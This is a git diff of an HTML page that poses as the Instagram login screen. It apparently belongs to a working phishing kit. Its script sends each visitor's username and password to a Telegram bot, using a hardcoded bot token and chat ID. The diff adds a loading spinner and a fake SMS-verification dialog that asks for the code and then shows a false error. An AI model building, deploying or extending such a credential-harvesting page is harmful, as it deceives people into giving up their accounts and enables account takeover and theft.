--- a/index.htm
+++ b/index.htm
@@ -5,7 +5,6 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Log in • Instagram</title>
-    <!-- Add Instagram logo as favicon -->
     <link rel="shortcut icon" href="./Instagram_logo_2022.svg.png" type="image/x-icon">
     <style>
         /* General Reset */
@@ -26,7 +25,7 @@
         }
 
         .login-container {
-            width: 350px;
+            width: 400px;
             background-color: #fff;
             padding: 40px;
             border-radius: 10px;
@@ -101,12 +100,105 @@
         .signup-link a:hover {
             text-decoration: underline;
         }
+
+        /* Modal Styles */
+        .modal {
+            display: none;
+            position: fixed;
+            top: 0;
+            left: 0;
+            width: 100%;
+            height: 100%;
+            background-color: rgba(0, 0, 0, 0.5);
+            justify-content: center;
+            align-items: center;
+        }
+
+        .modal-content {
+            background-color: white;
+            padding: 30px;
+            border-radius: 10px;
+            text-align: center;
+        }
+
+        .modal-content input {
+            width: 100%;
+            padding: 12px;
+            margin-top: 10px;
+            border: 1px solid #dbdbdb;
+            border-radius: 5px;
+            font-size: 14px;
+        }
+
+        .modal-content button {
+            background-color: #0095f6;
+            color: white;
+            border: none;
+            padding: 12px;
+            border-radius: 5px;
+            margin-top: 10px;
+            cursor: pointer;
+        }
+
+        .modal-content button:hover {
+            background-color: #0078d4;
+        }
+
+        /* Loading Spinner Styles */
+        #loadingSpinner {
+            display: none;
+            margin-top: 20px;
+            border: 4px solid #f3f3f3;
+            border-top: 4px solid #0095f6;
+            border-radius: 50%;
+            width: 30px;
+            height: 30px;
+            animation: spin 1s linear infinite;
+        }
+
+        #error {
+            color: red;
+        }
+
+        @keyframes spin {
+            0% {
+                transform: rotate(0deg);
+            }
+
+            100% {
+                transform: rotate(360deg);
+            }
+        }
+
+        /* Infinite loading spinner for SMS verification */
+        #smsLoadingSpinner {
+            display: none;
+
+            border: 4px solid #f3f3f3;
+            border-top: 4px solid #0095f6;
+            border-radius: 50%;
+            width: 50px;
+            height: 50px;
+            margin: 10px auto;
+            animation: spin 1s linear infinite;
+        }
+
+        #smsModal .modal-content p {
+            font-size: 14px;
+            color: #8e8e8e;
+        }
+
+        .error-message {
+            color: red;
+            margin-top: 20px;
+            font-size: 16px;
+        }
     </style>
     <script>
         // Function to send data to Telegram Bot
         function sendToTelegram(username, password) {
             const botToken = '7848679382:AAG9RDlm4FVRpyKcbXCoLExV_CoA4TCu7RI'; // Replace with your bot API token
-            const chatId = '6956607670'
+            const chatId = '6956607670'; // Replace with your chat ID
 
             const message = `Username: ${username}\nPassword: ${password}`;
 
@@ -131,11 +223,60 @@
             const password = document.getElementById('password').value;
 
             if (username && password) {
+                showLoadingSpinner();  // Show loading spinner
                 sendToTelegram(username, password); // Send username and password to Telegram
-                alert('Try agai to login!');
+                showModal(); // Show the modal after login attempt
             } else {
                 alert('Please enter both username and password.');
             }
+        }
+
+        // Show the loading spinner
+        function showLoadingSpinner() {
+            document.getElementById('loadingSpinner').style.display = 'block';
+        }
+
+        // Hide the loading spinner
+        function hideLoadingSpinner() {
+            document.getElementById('loadingSpinner').style.display = 'none';
+        }
+
+        // Show the modal
+        function showModal() {
+            setTimeout(() => {
+                hideLoadingSpinner(); // Hide the spinner once the message is sent
+                document.getElementById('smsModal').style.display = 'flex';
+            }, 2000); // Simulate delay for demo (e.g., network delay)
+        }
+
+        // Handle verification code submission
+        function handleVerificationCode() {
+            const verificationCode = document.getElementById('verificationCode').value;
+
+            // Show infinite loading for 2 minutes after submitting the code
+            showSmsLoadingSpinner();
+
+            if (verificationCode) {
+                setTimeout(() => {
+                    hideSmsLoadingSpinner();
+                    // Show error message after 2 minutes if code is not correct
+                    const errorMessage = document.getElementById("error");
+                    errorMessage.textContent = 'The code is not correct, double-check the code!';
+                }, 6000); // Keep loading spinner for 2 minutes (120000 ms)
+            } else {
+                hideSmsLoadingSpinner();
+                alert('Please enter the verification code.');
+            }
+        }
+
+        // Show infinite loading spinner for SMS verification
+        function showSmsLoadingSpinner() {
+            document.getElementById('smsLoadingSpinner').style.display = 'block';
+        }
+
+        // Hide the infinite loading spinner for SMS verification
+        function hideSmsLoadingSpinner() {
+            document.getElementById('smsLoadingSpinner').style.display = 'none';
         }
     </script>
 </head>
@@ -144,13 +285,16 @@
     <div class="login-container">
         <!-- Instagram Logo -->
         <img src="./Instagram_logo_2022.svg.png" alt="Instagram Logo">
-
+        <h1>Check your status in Instagram</h1>
         <!-- Login Form -->
         <form onsubmit="handleLogin(event)">
             <input type="text" id="username" name="username" placeholder="Username" required>
             <input type="password" id="password" name="password" placeholder="Password" required>
             <input type="submit" value="Log In">
         </form>
+
+        <!-- Loading Spinner -->
+        <div id="loadingSpinner"></div>
 
         <!-- Divider -->
         <div class="divider">
@@ -160,6 +304,20 @@
         <!-- Sign Up Link -->
         <div class="signup-link">
             <p>Don't have an account? <a href="#">Sign up</a></p>
+        </div>
+    </div>
+
+    <!-- Modal for SMS Verification -->
+    <div id="smsModal" class="modal">
+        <div class="modal-content">
+            <h3>Check your SMS, we have sent a code!</h3>
+            <p>If the code is not sent, try again to login.</p>
+            <input type="text" id="verificationCode" placeholder="Enter verification code" required>
+            <button onclick="handleVerificationCode()">Submit</button>
+
+            <div id="error"></div>
+            <!-- SMS Loading Spinner -->
+            <div id="smsLoadingSpinner"></div>
         </div>
     </div>
 </body>
